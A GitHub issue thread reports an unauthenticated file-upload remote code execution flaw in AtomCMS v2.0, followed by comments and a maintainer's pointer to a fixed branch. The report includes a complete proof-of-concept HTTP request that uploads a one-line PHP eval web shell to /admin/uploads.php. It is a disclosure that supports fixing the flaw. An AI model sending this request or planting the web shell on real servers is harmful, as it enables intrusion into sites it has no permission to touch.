An Unauthorized Remote Code Execution vulnerability exists in AtomCMS v2.0.

[bkfish]

An Unauthorized attacker can upload arbitrary file in the /admin/uploads.php and executing it on the server reaching the RCE.

poc

POST /admin/uploads.php?id=1 HTTP/1.1
Host: localhost:8888
Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041
Content-Length: 356
Connection: close

-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"


-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg


<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

you can find the filename in response. `1645019130555.php` then you get a shell in `/uploads/1645019130555.php`

analysis

file /admin/uploads.php line 10 without any protect for upload files extension

Repair suggestions

set some filter about files extension

[creptor]

Thank you for taking the time to write this Issue for the project. It's very helpful for new users to understand some of the common problems they can face while developing a website on any platform.

---

This is a very dangerous vulnerability, thanks for bringing it up.

I have found this reference which I believe has good information on how to deal with uploads on PHP, but it's a very difficult topic so I'll recommend some more digging.

Remember that Atom.CMS is not meant to be used in production, and it should be used solely for learning PHP in a controlled environment.

---

I'm not the author or maintainer of this project, just someone who learned a lot from the YouTube series and is willing to help.

[v-dumitrescu]

The branch "AtomCMS-2.1" contains security fixes.

[zentery]

@v-dumitrescu Could you please provide the patch submission link for this vulnerability? Thank you very much

[v-dumitrescu]

github.com/thedigicraft/Atom.CMS/blob/AtomCMS-2.1/admin/uploads.php